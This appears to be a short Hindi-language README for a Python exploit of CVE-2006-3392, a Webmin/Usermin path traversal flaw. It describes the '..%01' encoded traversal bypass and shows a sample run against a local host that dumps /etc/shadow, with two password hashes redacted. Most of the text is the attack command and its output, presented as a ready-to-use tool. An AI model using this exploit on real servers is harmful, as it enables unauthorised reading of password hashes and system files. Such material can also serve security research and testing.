
CVE-2006-3392 के लिए Python एक्सप्लॉइट, Webmin और Usermin में एक पथ ट्रैवर्सल भेद्यता, जो दूरस्थ हमलावरों को एनकोडेड डायरेक्टरी ट्रैवर्सल सीक्वेंस के माध्यम से मनमानी फ़ाइलों को पढ़ने की अनुमति देता है।
Webmin 1.290 से पहले और Usermin 1.220 से पहले का संस्करण HTML को डिकोड करने से पहले simplify_path फ़ंक्शन को कॉल करता है, जो रिमोट हमलावरों को मनमानी फ़ाइलों को पढ़ने की अनुमति देता है, जैसा कि "..%01" अनुक्रमों का उपयोग करके प्रदर्शित किया गया है, जो "../" अनुक्रमों को हटाने से पहले %01 जैसे बाइट्स को फ़ाइलनाम से हटाए जाने से बच जाता है। नोट: यह CVE-2006-3274 से भिन्न मुद्दा है।
$ python3 CVE-2006-3392.py -u http://127.0.0.1:10000
_______ ________ ___ ___ ___ __ ____ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \ / _ \ / / |___ \___ \ / _ \__ \
| | \ \ / /| |__ ______ ) | | | | | | |/ /_ ______ __) |__) | (_) | ) |
| | \ \/ / | __|______/ /| | | | | | | '_ \______|__ <|__ < \__, |/ /
| |____ \ / | |____ / /_| |_| | |_| | (_) | ___) |__) | / // /_
\_____| \/ |______| |____|\___/ \___/ \___/ |____/____/ /_/|____|
[Coded by Brosck]
[*] File path: /etc/shadow
root:[REDACTED]:17406:0:99999:7:::
daemon:*:17047:0:99999:7:::
bin:*:17047:0:99999:7:::
sys:*:17047:0:99999:7:::
sync:*:17047:0:99999:7:::
games:*:17047:0:99999:7:::
man:*:17047:0:99999:7:::
lp:*:17047:0:99999:7:::
mail:*:17047:0:99999:7:::
news:*:17047:0:99999:7:::
uucp:*:17047:0:99999:7:::
proxy:*:17047:0:99999:7:::
www-data:*:17047:0:99999:7:::
backup:*:17047:0:99999:7:::
list:*:17047:0:99999:7:::
irc:*:17047:0:99999:7:::
gnats:*:17047:0:99999:7:::
nobody:*:17047:0:99999:7:::
libuuid:!:17047:0:99999:7:::
Debian-exim:!:17047:0:99999:7:::
statd:*:17047:0:99999:7:::
sshd:*:17047:0:99999:7:::
mysql:!:17047:0:99999:7:::
proftpd:!:17406:0:99999:7:::
ftp:*:17406:0:99999:7:::
webmaster:[REDACTED]:17406:0:99999:7:::